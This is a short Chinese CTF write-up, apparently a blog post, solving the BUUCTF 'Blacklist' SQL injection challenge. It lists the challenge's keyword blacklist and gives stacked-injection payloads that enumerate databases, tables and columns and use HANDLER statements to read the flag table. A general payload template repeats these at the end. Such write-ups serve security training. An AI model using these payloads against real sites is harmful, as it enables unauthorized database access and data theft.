【BUUCTF】Blacklist

【BUUCTF】Blacklist （SQL注入）

题目来源

收录于：BUUCTF　　GYCTF2020

题目描述

纯粹的SQL注入题

当触发黑名单时返回如下

过滤了以下关键字

set prepare alter rename select update delete drop insert where  .

题解

发现可以进行堆叠注入

?inject=1';show databases;

爆表名

?inject=1';show tables;

爆字段名（可以不用爆字段名，这道题用不到），这里两个payload都可以：

?inject=1';show columns from FlagHere;
?inject=1';desc FlagHere;

爆表的内容

?inject=1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;

得到flag

总结

堆叠注入姿势如下：

//爆库
?id=1';show databases;%23   

//爆表名   
?id=1';show tables;%23  

//爆字段名，以下两个都可以       
?id=1';show columns from 表名;%23 
?id=1';desc 表名;%23   

//读表内容     
?id=1';HANDLER 表名 open;HANDLER 表名 read first;HANDLER 表名  close;%23

注意：当表名以数字开头时，需要用反引号对其包裹。

posted @ 2024-08-06 18:01 Mr_Soap 阅读(20) 评论(0) 编辑收藏举报

刷新页面返回顶部

MrSoap

【BUUCTF】Blacklist

【BUUCTF】Blacklist （SQL注入）

题目来源

题目描述

题解

总结

公告